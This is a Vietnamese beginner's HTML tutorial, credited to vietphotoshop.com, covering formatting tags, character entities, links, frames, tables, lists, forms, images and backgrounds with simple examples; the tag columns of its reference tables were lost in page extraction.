Ví dụ này cho bạn thấy một vài vấn đề về căn chỉnh của HTMLVí dụ này giải thích cách thêm một đoạn chú thích vào mã nguồn của HTML

HTML có thể dùng để định dạng văn bản như ta làm với Word như đậm, nghiêng hoặc gạch chân

Dưới đây là một vài ví dụ bạn có thể tự mình thử.

Một vài ví dụ

Ví dụ này giải thích cách nào bạn có thể điều khiển xuống hàng và khoảng trống với Pre tag.


Ví dụ này hướng dẫn bạn cách tạo một địa chỉ trong HTML
Ví dụ này hướng dẫn bạn cách sử dụng kiểu viết tắt.
Muốn View source thì làm như thế nào?

Nếu bạn muốn xem mã nguồn của một trang web bạn chỉ cần nhấp chuột phải > View Source là bạn có thể xem được cấu trúc của trang đó như thế nào.

Những thẻ dùng để định dạng văn bản

Tag
Mô Tả
Định dạng chữ đậm
Định dạng chữ lớn
Định dạng kiểu chữ được nhấn mạnh
Chữ in nghiêng
Chữ nhỏ
Chữ đậm
định dạng subscripted (chữ nhỏ)
Đ5inh dạng superscripted (chữ lên cao)
Dạng chữ mới chèn thêm
Dạng chữ bị xóa
Hết hỗ trợ. Thay bằng <del>
Hết hỗ trợ. Thay bằng <del>
Gạch dưới

"Computer Output" Tags

Tag
Mô Tả
Định dạng code
Kiểu keyboard text 
Kiểu sample computer code
Kiểu teletype text
Kiểu a variable
Kiểu preformatted text
<listing>
Hết hỗ trợ. Dùng<pre> thay thế
<plaintext>
Hết hỗ trợ. Dùng<pre> thay thế
<xmp>
Hết hỗ trợ. Dùng<pre> thay thế

Thẻ Citations, Quotations, và Definition

Tag
Mô Tả
Kiểu tóm tắt
Kiểu viết tắt
Kiểu địa chỉ
Kiểu chữ định hướng
Kiểu trích dẫn dài
Kiểu trích dẫn ngắn
1 kiểu trích dẫn khác
Kiểu định nghĩa
Một vài ký tự tương tự như dấu nhỏ hơn <, có một ý nghĩa đặc biệt trong HTML, và do đó không thể được sử dụng như là chữ được. Do vậy để hiển thị được dấu nhỏ hơn < trong HTML chúng ta phải sử dụng những ký tự đặc biệt. Bởi vì dấu < xác định điểm bắt đầu của một thẻ HTML. Nên nếu bạn muốn trình duyệt hiển thị ký tự đó bạn phải thêm và code của nó những ký tự đặc biệt.

Một ký tự đặc biệt có 3 phần: Ký hiệu (&), tên của ký tự hoặc một dấu # và một dãy số và cuối cùng là dấu chấm phẩy ;

Để hiển thị được dấu nhỏ hơn trong HTML bạn phải viết là &lt; hoặc &#60;

Cái hay của việc sử dụng tên thay vì sử dụng số là vì tên của nó thì dễ nhớ hơn nhiều. Nhưng cái dở lại là không phải trình duyệt nào cũng hỗ trợ những tên mới này, trong khi đó hầu hết các trình duyệt đều có thể nhận ra nó ở dạng số.

Bạn nên chú ý rằng ký tự đặc biệt phân biệt chữ hoa và chữ thường. Ví dụ sau đây sẽ giúp bạn thực nghiệm với những ký tự đặc biệt. Lưu ý bạn rằng những ký tự này chỉ có trong trình duyệt Internet Explorer.
Non-breaking space
Ký tự được dùng nhiều nhất trong HTML có lẽ là nbsp (non-breaking space)

Thường thì HTML cắt bớt khoảng trống trong chữ của bạn. Ví dụ nếu bạn viết 10 chỗ trống trong text của bạn thì HTML sẽ loại bỏ 9 trong số đó. Để thêm khoảng trống vào chữ của bạn, bạn phải sử dụng ký tự đặc biệt là &nbsp;

Những ký tự được dùng thường xuyên nhất

Kết quả
Loại
Tên của ký tự
Số

một khỏang trắng
&nbsp;
&#160;
<
nhỏ hơn
&lt;
&#60;
>
lớn hơn
&gt;
&#62;
&
dấu và
&amp;
&#38;
"
ngoắc kép
&quot;
&#34;
'
ngoặc đơn
&apos; (does not work in IE)
&#39;

Một vài ký tự khác

Kết quả
Loại
Tên của ký tự
Số
¢
cent
&cent;
&#162;
£
pound
&pound;
&#163;
¥
yen
&yen;
&#165;
§
section
&sect;
&#167;
©
copyright
&copy;
&#169;
®
registered trademark
&reg;
&#174;
×
nhân
&times;
&#215;
÷
chia
&divide;
&#247;

Liên kết HTML HTML sử dụng siêu liên kết để liên kết những tài liệu khác nhau trên trang web.
Ví dụ:
Ví dụ này chỉ cho bạn cách tạo siêu liên kết như thế nào
Ví dụ này hướng dẫn bạn cách dùng hình làm đường liên kết.

Thẻ Anchor và thuộc tính Href
HTML sử dụng thẻ <a> (anchor) để tạo đường liên kết đến một tài liệu khác.

Thẻ anchor có thể liên kết đến bất cứ một tài nguyên nào trên internet, chúng có thể là một trang HTML, một tấm hình, một file nhạc, một bộ phim .v.v.

Cú pháp để tạo một thẻ anchor
<a href="url">Chữ bạn muốn ở đây</a>
Thẻ <a> được sử dụng để tạo một điểm neo và liên kết bắt đầu từ đó, thuộc tính href được sử dụng để chỉ ra tài liệu sẽ được liên kết đến, và chữ ở xuất hiện ở giữa hai tag < và > sẽ được hiển thị dưới dạng siêu liên kết.
Điểm neo sau xác định liên kết đến diễn đàn của vietphotoshop.com
<a href="http://www.vietphotoshop.com/forum">Mời bạn vào diễn đàn của VPTS</a>
Dòng code ở trên sẽ xuất hiện như sau trong trình duyệt.

Mời bạn vào diễn đàn của VPTS

Thuộc tính đích đến:
Với thuộc tính đích đến, bạn có thể xác định liên kết đến tài liệu khác sẽ được mở ra ở đâu. Dòng code dưới đây sẽ mở tài liệu được liên kết trong một cửa sổ trình duyệt mới.
<a href="http://www.vietphotoshop.com/forum"target="_blank">Mời bạn vào diễn đàn của VPTS</a>
Thẻ anchor và thuộc tính tên
Thuộc tính tên được sử dụng để tạo một điểm neo đã được đặt tên. Khi sử dụng điểm neo đã được đặt tên trước chúng ta có thể tạo ra những đường liên kết mà người đọc có thể nhảy trực tiếp đến một phần cụ thể nào đó trên trang web, thay vì họ phải kéo xuống dưới để tìm thông tin. Một dạng như là bookmark vậy!

Dưới đây là cú pháp của điểm neo được đặt tên trước:
<a name="Tên">Chữ bạn muốn hiển thị ở đây</a>
Thuộc tính tên được sử dụng để tạo điểm neo. Tên của điểm neo có thể là bất cứ thứ gì bạn muốn.

Dòng code sau xác định điểm neo được đặt tên trước.
<a name="Photoshop Tutorial">Tất cả tutorial ở đây</a>
Bạn có thể nhận ra rằng thẻ anchor được đặt tên trước được hiển thị không có gì đặc biệt. Để trực tiếp liên kết phần Photoshop Tutorial, bạn chỉ phải thêm dấu # và tên của điểm neo và cuối cùng của một URL. Xem ví dụ sau
<a href="http://www.vietphotoshop.com/#tutorials">Quay lại trang tutorials</a>
Một đường liên kết đến phần Quay lại trang tutorials TỪ trang "html_chuong_3.htm" sẽ như sau:
<a href="#tutorials">Quay lại trang tutorials</a>
Mẹo giúp bạn
Luôn luôn thêm một đường dẫn mỗi khi bạn muốn dẫn đến một thư mục con. Nếu bạn để đường liên kết như sau:
href="http://www.vietphotoshop.com/html" thì bạn sẽ tạo ra 2 lệnh HTTP cho server, bởi vì server sẽ thêm một đường dẫn vào địa chỉ và tạo ra một lệnh mới như sau:

Điểm neo được đặt tên thường được sử dụng để tạo Mục Lục tại trang đầu tiên của một tài liệu nhiều trang. Môi chương trong tài liệu đó được cho một điểm neo, và liên kết đến mỗi một điểm neo này sẽ được đặt ở trên cùng của tài liệu.

Nếu trình duyệt không tìm được điểm neo được chỉ ra từ trước, nó sẽ quay lên phần trên cùng của tài liệu.

Một vài ví dụ

Ví dụ này hướng dẫn bạn cách tạo ra một đường liên kết trực tiếp đến địa chỉ email.

Phức tạp hơn dạng 1
Với frame bạn có thể hiển thị nhiều trang web trên cùng một cửa sổ trình duyệt. Mỗi một tài liệu HTML được gọi là một frame, và mỗi frame đều độc lập với những frame khác.

Một vài ví dụ về Frame

Ví dụ này hướng dẫn bạn cách tạo một tập hợp frame hàng học với 3 tài liệu khác nhau.


Những nhược điểm khi sử dụng frame:
Người làm web phải theo dõi nhiều tài liệu HTML
Khó có thể in ấn toàn bộ trang web.

Thẻ frameset
Thẻ <frameset> xác định bạn sẽ chia cửa sổ trình duyệt thành những frame như thế nào. Môi một frame xác định một tập hợp các hàng hoặc cột. Giá trị của hàng hoặc cột chỉ ra diện tích của màn hình mà frame đó sẽ chiếm.

Thẻ Frame
Thẻ <frame> xác định tài liệu HTML nào sẽ được chèn vào mỗi frame.
Ở ví dụ dưới đây bạn có một frameset với hai cột. Cột thứ nhất được thiết lập là chiếm 25% độ rộng của cửa sổ trình duyệt. Cột thứ hai được thiết lập sẽ chiếm 75% độ rộng của cửa sổ trình duyệt. Tài liệu html tên là "frame_a.htm" được chèn vào cột thứ nhất, và "frame_b.htm" được chèn vào cột thứ hai.
<frameset cols="25%,75%">
<frame src="frame_a.htm">
<frame src="frame_b.htm">
</frameset>

Mẹo nhỏ giúp bạn
Nếu frame của bạn có đường viền thì người dùng có thể định lại kích thước bằng cách kéo nó. Để tránh việc này bạn có thể thêm noresize="noresize" vào thẻ <frame>

Thêm thẻ <noframes> cho trình duyệt không hỗ trợ frame.
Một vài ví dụ nữa
Ví dụ này hướng dẫn bạn cách tạo một tập hợp frame với 3 tài liệu và làm cách nào để gộp nó vào thành hàng và cột.
Ví dụ này chỉ ra cách sử dụng thuộc tính noresize. Frame trong ví dụ này không thể resize được. Di chuột vào đường biên ở giữa hai frame và bạn có thể nhận ra rằng bạn không thể di chuyển được đường biên.
Ví dụ này hướng dẫn bạn cách tạo ra một mục lục (navigation) bằng frame. Frame navigation chứa một danh sách những đường link và đích là ở frame thứ hai. Tài liệu "tryhtml_contents.htm" chứa 3 đường link và code của đường link như sau
<a href ="frame_a.htm" target ="showframe">Frame a</a><br>
<a href ="frame_b.htm" target ="showframe">Frame b</a><br>
<a href ="frame_c.htm" target ="showframe">Frame c</a>
Frame thứ hai sẽ hiển thị nội dung của tài liệu được link.

Frame ở trong một trang HTML
Ví dụ này chỉ bạn cách tạo 2 frame, Frame này chứa nguồn đến một phần cụ thể của một file. Phần cụ thể đó được tạo bởi <a name="c10"> trong file "link.htm"
Ví dụ này sẽ cho bạn thấy có 2 frame. Một frame là navigation frame (content.htm) ở bên trái bao gồm một danh sách các đường link với frame thứ 2 (link.htm) là đích đến. Frame thứ hai hiển thị tài liệu được link. Một trong các đường link ở navigation frame được liên kết đến một phần cụ thể ở file đích. Code HTML của file "content.htm" nhìn như sau: <a href="link.htm" target="showframe"> Link without Anchor</a><br><a href ="link.htm#C10" target ="showframe">Link with Anchor</a>.

Thẻ frame

Tag
Mô Tả
Kiểu a set of frames
Kiểu a sub window (a frame)
Kiểu a noframe section for browsers that do not handle frames
Kiểu an inline sub window (frame)

Với HTML bạn cũng có thể tạo bẳng cho trang web của mình.

Ví dụ
Ví dụ này chỉ bạn cách tạo một bẳng bằng HTML

Bảng
Bảng được định dạng bởi thẻ <table>. Một bảng được chia ra làm nhiều hàng với thẻ <tr>, môi hàng được chia ra làm nhiều cột dữ liệu với thẻ <td>. Cbữ td là chữ viết tắt của "table data", là nội dung của cột dữ liệu. Một cột dữ liệu có thể bao gồm chữ, hình ảnh, danh sách, đoạn vắn, form và bảng v.v.
<table border="1">
<tr>
<td>row 1, cell 1</td>
<td>row 1, cell 2</td>
</tr>
<tr>
<td>row 2, cell 1</td>
<td>row 2, cell 2</td>
</tr>
</table>
Đoạn code trên sẽ hiển thị như thế này trong cửa sổ trình duyệt
row 1, cell 1
row 1, cell 2
row 2, cell 1
row 2, cell 2
Bảng và thuộc tính đường biên
Nếu bạn không thiết lập thuộc tính đường biên cho bảng thì bảng của bạn sẽ được hiển thị mà không có đường biên. Đôi khi nó có thể hữu dụng nhưng thường thì bạn muốn bảng của bạn có đường biên.

Để hiển thị đường biên của một bảng, bạn phải sử dụng thuộc tính đường biên.
<table border="1">
<tr>
<td>Row 1, cell 1</td>
<td>Row 1, cell 2</td>
</tr>
</table>
Heanding trong bảng
Heading trong một bảng được xác định bằng thẻ <th>
<table border="1">
<tr>
<th>Heading</th>
<th>Another Heading</th>
</tr>
<tr>
<td>row 1, cell 1</td>
<td>row 1, cell 2</td>
</tr>
<tr>
<td>row 2, cell 1</td>
<td>row 2, cell 2</td>
</tr>
</table>
Nó sẽ hiển thị như thế này ở trên trình duyệt
Heading
Another Heading
row 1, cell 1
row 1, cell 2
row 2, cell 1
row 2, cell 2
Cột trống trong bảng
Cột trống không có nội dung thì không được hiển thị tốt lắm ở hầu hết các trình duyệt.
<table border="1">
<tr>
<td>row 1, cell 1</td>
<td>row 1, cell 2</td>
</tr>
<tr>
<td>row 2, cell 1</td>
<td></td>
</tr>
</table>
Nó sẽ có dạng thế này trên trình duyệt
row 1, cell 1
row 1, cell 2
row 2, cell 1
Bạn chú ý rằng đường biên bao quanh cột trống bị mất (nhưng trong trình duyệt Mozilla Firefox nó sẽ hiển thị đường biên)
Để tránh điều này xảy ra, bạn thêm một non-breaking space (&nbsp;) vào cột trống đó, để làm cho đường biên của nó được hiện thỉ.
<table border="1">
<tr>
<td>row 1, cell 1</td>
<td>row 1, cell 2</td>
</tr>
<tr>
<td>row 2, cell 1</td>
<td>&nbsp;</td>
</tr>
</table>
Nó sẽ hiển thị như sau ở trình duyệt
row 1, cell 1
row 1, cell 2
row 2, cell 1

Mẹo nhỏ giúp bạn
Loại thẻ <thead>,<tbody> and <tfoot> ít khi được sử dụng, bởi vì nó không phải là tính năng được
Một vài ví dụ nữa
Ví dụ này chỉ cho bạn cách sử dung "&nbsp;" để hiển thị cột không có nội dung.
Ví dụ này hướng dẫn bạn cách hiển thị nội dung ở trong nội dung khác.
Ví dụ này hướng dẫn bạn cách tạo cellpadding để tạo ra nhiều khoảng trắng hơn giữa nội dung và đường biên của nó.
Cách sử dụng cellspacing để tăng khoảng cách giữa các cột.

Hướng dẫn cách sử dụng thuộc tính "align" để căn chỉnh nội dung của cột, và tạo ra một bảng nhìn đẹp mắt hơn.
Chỉ cách sử dụng thuộc tính "frame" để điều khiển đường biên của bảng.

Thẻ table

Tag
Mô Tả
Vẽ bảng
hàng đầu của bảng
hàng trong bảng
ô trong hàng
nhãn của bảng
nhóm các cột
Định các thuộc tính của cột
Hàng Đầu bảng
Thân của bảng
Hàng cuối bảng
HTML hỗ trợ những dạng danh sách theo thứ tự, không theo thứ tự và định nghĩa.

Ví dụ

Danh sách không theo thứ tự
Danh sách không theo thứ tự là một danh sách các mục. Danh sách của các mục sẽ được đánh dấu bởi những bullet (dạng như gạch đầu dòng nhưng là một vòng tròn màu đen).

Danh sách không theo thứ tự bắt đầu với thẻ <ul>. Mỗi một mục được bắt đầu với một thẻ <li>.
<ul>
<li>www.bantayden.com</li>
<li>www.vietphotoshop.com</li>
</ul>
Nó sẽ xuất hiện như thế này trong trình duyệt.
Ở giữa những mục trên bạn có thể chèn thêm chữ vào như là xuống hàng, hình ảnh, đường liên kết thậm chí là một danh sách khác.

Danh sách theo thứ tự
Danh sách theo thứ tự cũng là một dạng danh sách của các mục. Nhưng những mục trong đó được đánh dấu bởi số. Một danh sách theo thứ tự bắt đầu với thẻ <ol>. Mỗi mục được bắt đầu với thẻ <li>.
<ol>
<li>www.bantayden.com</li>
<li>www.vietphotoshop.com</li>
</ol>
Nó sẽ xuất hiện như thế này trong trình duyệt.
 1. www.vietphotoshop.com
Ở giữa những mục trên bạn có thể chèn thêm chữ vào như là xuống hàng, hình ảnh, đường liên kết thậm chí là một danh sách khác.
Danh sách dạng định nghĩa
Một danh sách dạng định nghĩa không phải là danh sách của các hạng mục. Nó là một danh sách của các thuật ngữ và những lời giải thích của thuật ngữ đó. Một danh sách định nghĩa bắt đầu với thẻ <dl>. Mỗi một thuật ngữ được bắt đầu với thẻ <dt>. Mỗi định nghĩa trong danh sách định nghĩa được bắt đầu bằng thẻ <dd>.
<dl>
<dt>www.bantayden.com</dt>
<dd>Tiền thân của vietphotoshop</dd>
<dt>www.vietphotoshop.com</dt>
<dd>Trang web chuyên về Photoshop cho người Việt</dd>
</dl>
Nó sẽ xuất hiện như sau trong trình duyệt

       Tiền thân của vietphotoshop
       Trang web chuyên về Photoshop cho người Việt
Ở giữa những mục trên bạn có thể chèn thêm chữ vào như là xuống hàng, hình ảnh, đường liên kết thậm chí là một danh sách khác.

Một vài ví dụ nữa
Những thẻ danh sách
Tag
Mô Tả
Danh sách có sấp xếp
Danh sách không sáp xếp
1 phần tử trong danh sách
Kiểu danh sách
Hết hỗ trợ. Dùng<ul> thay thế
Hết hỗ trợ. Dùng<ul> thay thế
HTML form và trường nhập liệu.
HTML form được sử dụng để chọn những dữ liệu nhập vào khác nhau của người dùng.

Ví dụ
Cách tạo những trường chữ trong một trang HTML. Người dùng có thể viết chữ trong trường chữ.


Một form là một vùng mà nó bao gồm những thành phần của form. Thành phần của form là những thành phần cho phép người dùng có thể điền thông tin như là trường chữ, menu thả xuống, nút radio, và các hộp kiểm vào một form.

Một form được xác định bởi thẻ <form>
<form>
<input>
<input>
</form>
Nhập liệu
Thẻ form được sử dụng nhiều nhất là thẻ <input>. Loại dữ liệu nhập vào sẽ được xác định bởi thuộc tính của nó. Những trường nhập liệu được sử dụng nhiều nhất được giải thích ở dưới đây.

Text field
Text field được sử dụng khi bạn muốn người dùng đánh chữ, số v.v.. vào một form.
<form>
First name:
<input type="text" name="firstname">
<br>
Last name:
<input type="text" name="lastname">
</form>
Nó sẽ xuất hiện như sau trong trình duyệt

First name: 
Last name: 

Bạn chú ý rằng bản thân của form thì bị ẩn đi. Hơn nữa trên hầu hết các trình duyệt trường text được mặc định là 20 ký tự.

Nút radio
Nút radio được sử dụng khi bạn muốn người dùng chọn một trong những lựa chọn bạn đưa ra.
<form>
<input type="radio" name="sex" value="male"> Male
<br>
<input type="radio" name="sex" value="female"> Female
</form>
Nó sẽ xuất hiện như sau trên trình duyệt

 Male
 Female

Chú ý rằng chỉ có một lựa chọn có thể được chọn.

Hộp kiểm
Hộp kiểm được sử dụng khi bạn muốn người chọn có thể chọn nhiều lựa chọn hơn.
<form>
<input type="checkbox" name="bike">
I have a bike
<br>
<input type="checkbox" name="car">
I have a car
</form>
Nó sẽ như sau trong trình duyệt

 I have a bike
 I have a car

Thuộc tính hoạt động cùa form và nút Submit.
Khi người dùng nhấp chuột vào nút "submit", nội dung của form đó sẽ được gửi đến một tệp tin khác. Thuộct ính hoạt động của form xác định tên của file mà nó sẽ gửi nội dung đến. Tệp tin đó được xác định trong thuộc tính hoạt động của form và thường thì nó sẽ có những hành động với dữ liệu nó nhận được.
<form name="input" action="html_form_action.asp"
method="get">
Username:
<input type="text" name="user">
<input type="submit" value="Submit">
</form>
Trong trình duyệt nó nhìn như sau

Username:  

Khi bạn gõ tên bạn vào trường chữ ở trên và nhấp vào nút Submit, bạn sẽ gửi thông tin đó vào một trang gọi là "html_form_action.asp". Trang đó sẽ chỉ cho bạn thấy dữ liệu nhận được.

Thêm một vài ví dụ

Ví dụ về form
Cách chèn form vào một trang, form chứa 2 trường nhập liệu và một nút submit.

Thẻ của form

Tag
Mô Tả
Kiểu form để nhập thông tin
Một ô nhập liệu
Vùng nhập liệu có nhiều hàng
Nhãn
Nhóm các vùng nhập với nhau
nhản của 1 fieldset
Danh sách chọn
nhóm các phần tử trong danh sách chọn
1 phần tử trong danh sách chọn
Nút bấm
<isindex>
Hết hỗ trợ. Dùng <input> thay thế
Với HTML bạn có thể thể hiện hình ảnh trong tài liệu.

Ví dụ
Cách cho hiển thị một tấm hình trên trang web.
Cách hiện một hoặc nhiều tấm hình từ một thư mục khác hoặc từ một server khác trên trang web của bạn.
Thẻ Image và thuộc tính src
Trong HTML, hình ảnh được xác định bởi thẻ <img>. Để hiển thị một hình trên trang web, bạn cần phải sử dụng thuộc tính src. Src là chữ viết tắt của source. Giá trị của thuộc tính src là địa chỉ URL của hình ảnh mà bạn muốn hiển thị trên trang web.
Cú pháp để xác định một tấm hình
<img src="url">
Địa chỉ URL chỉ đến điểm mà hình ảnh được lưu trữ. Một file hình có tên là "boat.gif" được đặt ở thư mục images trên www.bantayden.com có địa chỉ URL là: http://www.bantayden.com/images/boat.gif
Trình duyệt sẽ hiển thị hình ảnh nơi mà có thẻ image được chèn trong tài liệu. Nếu bạn muốn thêm thẻ image vào giữa một đoạn văn, trình duyệt sẽ hiển thị đoạn văn thứ nhất trước, sau đó đến hình và sau cùng là đoạn văn thứ hai.

Thuộc tính Alt
Thuộc tính alt được sử dụng để xác định chữ thay cho hình. Bởi vì nếu hình đó không hiện được thì một dòng chữ sẽ xuất hiện để báo cho người đọc biết. Gía trị của thuộc tính alt là một dòng chữ như sau:
<img src="boat.gif" alt="Big Boat">
Thuộc tính alt báo cho người đọc biết họ không xem được hình gì khi mà trình duyệt không load được hình đó. Trình duyệt sau đó sẽ hiển thị dòng chữ thay vì hình ảnh. Bạn nên tạo cho mình thói quen thêm thuộc tính "alt" vào mỗi tấm hình trên một trang, để tăng khả năng hiển thị và giúp những người lướt web mà không dùng hình ảnh.

Một vài ví dụ

Cách tạo một image map, với những vùng có thể click được. Mỗi một vùng của hình là một đường liên kết.

Cách biến một tấm hình thành một image map. Bạn sẽ thấy nếu bạn di chuyển con chuột lên trên tấm hình, góc phần tư sẽ xuất hiện trên thanh trạng thái.

Thẻ Image

Tag
Mô Tả
Hình ành
Định nghĩa map ( sơ đồ trên 1 hình)
Định Area, 1 vùng nhỏ tương ứng trên sơ đồ
Một background đẹp có thể làm cho trang của bạn nhìn đẹp mắt hơn.

Backgrounds
Thẻ <body> có hái thuộc tính nơi mà bạn có thể chọn loại background cho mình. Background có thể là một màu hoặc là một tấm hình.

Bgcolor
Thuộc tính bgcolor thiết lập hình nền là một màu. Giá trị của thuộc tính này là hệ số hexadecimal, một giá trị màu RGB hoặc một tên màu
<body bgcolor="#000000">
<body bgcolor="rgb(0,0,0)">
<body bgcolor="black">
Dòng code trên cùng thiết lập hình nền thành màu đen.Background

Thuộc tính background thiết lập một tấm hình làm hình nền. Giá trị của thuộc tính này là địa chỉ URL của tấm hình bạn muốn sử dụng. Nếu một tấm hình nhở hơn so với cửa sổ trình duyệt, tấm hình đó sẽ tự nhân lên đến khi nào nó che phủ hết cửa sổ trình duyệt.
<body background="clouds.gif">
<body background="http://www.w3schools.com/clouds.gif">
Địa chỉ URL có thể là tương đối như là ở dòng code thứ nhất hoặc tuyệt đối như là ở dòng thứ 2.

Chú ý: nếu bạn muốn sử dụng hình nền, bạn nên nhớ rằng:
 • Hình nền đó có làm giảm tốc độ load của trang nhiều không? thường thì hình được chọn làm hình nền không nên vượt quá 10K.
 • Hình nền đó có hợp với các hình khác trên trang không?
 • Hình nền đó có hợp với chữ không?
 • Hình nền đó nhìn có đẹp không nếu nó chỉ có một mình
 • Hình nền đó có làm cho người đọc mất tập trung không?
Mẹo nhỏ giúp bạn
 • Một số ít những trang web có sử dụng hình nền bằng hình ảnh
 • Hầu hết các site sử dụng hình nền là màu trắng, đen hoặc xám.
© www.vietphotoshop.com - Dịch bởi Bá tước Monte Cristo
Xem Chi Tiết…